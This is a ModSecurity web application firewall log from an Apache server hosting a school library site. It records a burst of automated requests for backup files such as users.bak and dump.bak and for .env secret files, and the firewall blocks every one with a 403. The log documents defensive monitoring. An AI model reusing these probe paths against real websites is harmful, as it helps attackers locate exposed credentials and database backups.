Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a854a22-Z-- --96617675-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFxAAAAMg 103.236.140.4 58918 103.236.140.4 8181 --96617675-B-- GET /dump.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:59.0.2) Gecko/20100101 Firefox/59.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 162529307 --96617675-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --96617675-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201811238 1660 (- - -) Stopwatch2: 1747683201811238 1660; combined=647, p1=322, p2=295, p3=0, p4=0, p5=29, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96617675-Z-- --652ed541-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_twAAAIw 103.236.140.4 60856 103.236.140.4 8181 --652ed541-B-- GET /js.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 161447984 --652ed541-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --652ed541-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201831693 1651 (- - -) Stopwatch2: 1747683201831693 1651; combined=588, p1=287, p2=274, p3=0, p4=0, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --652ed541-Z-- --c08a7615-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooVQAAAAQ 103.236.140.4 59864 103.236.140.4 8181 --c08a7615-B-- GET /2025.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 OPR/58.0.3135.107 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152764482 --c08a7615-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c08a7615-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201840798 1742 (- - -) Stopwatch2: 1747683201840798 1742; combined=626, p1=298, p2=283, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c08a7615-Z-- --9c87aa32-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooXQAAAA0 103.236.140.4 59692 103.236.140.4 8181 --9c87aa32-B-- GET /erpustakaansmkn22jakartaschid.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0.1) Gecko/20100101 Firefox/65.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871652 --9c87aa32-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9c87aa32-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201855578 1725 (- - -) Stopwatch2: 1747683201855578 1725; combined=632, p1=291, p2=313, p3=0, p4=0, p5=28, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c87aa32-Z-- --492d0108-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooYgAAAAc 103.236.140.4 59692 103.236.140.4 8181 --492d0108-B-- GET /2018.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686; rv:60.3.0) Gecko/20100101 Firefox/60.3.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530486 --492d0108-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --492d0108-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201863260 1859 (- - -) Stopwatch2: 1747683201863260 1859; combined=627, p1=309, p2=286, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --492d0108-Z-- --4388ad6e-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIooZAAAABY 103.236.140.4 59750 103.236.140.4 8181 --4388ad6e-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167804952 --4388ad6e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4388ad6e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201866935 1824 (- - -) Stopwatch2: 1747683201866935 1824; combined=665, p1=327, p2=311, p3=0, p4=0, p5=27, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4388ad6e-Z-- --0b2c9d27-A-- [20/May/2025:02:33:21 +0700] aCuHgb8BMImlI6dyVeOFyAAAAMo 103.236.140.4 58918 103.236.140.4 8181 --0b2c9d27-B-- GET /wp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166166552 --0b2c9d27-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0b2c9d27-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201937115 1900 (- - -) Stopwatch2: 1747683201937115 1900; combined=632, p1=324, p2=283, p3=0, p4=0, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b2c9d27-Z-- --c7c3443b-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIoofAAAAA8 103.236.140.4 59380 103.236.140.4 8181 --c7c3443b-B-- GET /local.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166166555 --c7c3443b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c7c3443b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201947110 2859 (- - -) Stopwatch2: 1747683201947110 2859; combined=986, p1=458, p2=493, p3=0, p4=0, p5=35, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7c3443b-Z-- --5688cf4a-A-- [20/May/2025:02:33:21 +0700] aCuHgTuVdcwZ_qZ5ZIoohAAAAAk 103.236.140.4 59750 103.236.140.4 8181 --5688cf4a-B-- GET /2019.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871673 --5688cf4a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5688cf4a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201952915 2326 (- - -) Stopwatch2: 1747683201952915 2326; combined=966, p1=507, p2=422, p3=0, p4=0, p5=37, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5688cf4a-Z-- --69e70f74-A-- [20/May/2025:02:33:21 +0700] aCuHgWyGBQNQTJej4E5_wAAAAJA 103.236.140.4 60856 103.236.140.4 8181 --69e70f74-B-- GET /data.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809 Safari/537.36 OPR/58.0.3135.107 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160792591 --69e70f74-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --69e70f74-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201958020 1830 (- - -) Stopwatch2: 1747683201958020 1830; combined=705, p1=317, p2=362, p3=0, p4=0, p5=25, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69e70f74-Z-- --c9bff547-A-- [20/May/2025:02:33:21 +0700] aCuHgQZaP57SewDBUi9oNgAAAEM 103.236.140.4 59608 103.236.140.4 8181 --c9bff547-B-- GET /erpustakaan.smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160563227 --c9bff547-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c9bff547-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683201970512 2495 (- - -) Stopwatch2: 1747683201970512 2495; combined=968, p1=455, p2=478, p3=0, p4=0, p5=35, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9bff547-Z-- --07ba1f6f-A-- [20/May/2025:02:33:41 +0700] aCuHlTuVdcwZ_qZ5ZIoosQAAAAo 103.236.140.4 33644 103.236.140.4 8181 --07ba1f6f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 86.143.131.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 86.143.131.186 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --07ba1f6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07ba1f6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747683221473361 854 (- - -) Stopwatch2: 1747683221473361 854; combined=333, p1=299, p2=0, p3=0, p4=0, p5=34, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07ba1f6f-Z-- --3999381e-A-- [20/May/2025:02:33:42 +0700] aCuHlgZaP57SewDBUi9oRQAAAEI 103.236.140.4 33662 103.236.140.4 8181 --3999381e-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 86.143.131.186 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 86.143.131.186 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --3999381e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3999381e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747683222532267 852 (- - -) Stopwatch2: 1747683222532267 852; combined=297, p1=257, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3999381e-Z-- --bdb1062e-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoouwAAAAg 103.236.140.4 33756 103.236.140.4 8181 --bdb1062e-B-- GET /php.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994953 --bdb1062e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bdb1062e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226914529 2630 (- - -) Stopwatch2: 1747683226914529 2630; combined=840, p1=413, p2=399, p3=0, p4=0, p5=27, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bdb1062e-Z-- --784a7b63-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoovgAAAAU 103.236.140.4 33756 103.236.140.4 8181 --784a7b63-B-- GET /site.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757548 --784a7b63-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --784a7b63-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226930960 2185 (- - -) Stopwatch2: 1747683226930960 2185; combined=806, p1=402, p2=375, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --784a7b63-Z-- --904d2e43-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoovwAAABQ 103.236.140.4 33756 103.236.140.4 8181 --904d2e43-B-- GET /users.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.8.0) Gecko/20100101 Firefox/52.8.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 127994984 --904d2e43-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --904d2e43-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683226946455 2072 (- - -) Stopwatch2: 1747683226946455 2072; combined=883, p1=402, p2=440, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --904d2e43-Z-- --c0636471-A-- [20/May/2025:02:33:46 +0700] aCuHmjuVdcwZ_qZ5ZIoowQAAAAo 103.236.140.4 33760 103.236.140.4 8181 --c0636471-B-- GET /smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5; rv:57.0.3) Gecko/20100101 Firefox/57.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182392 --c0636471-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c0636471-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
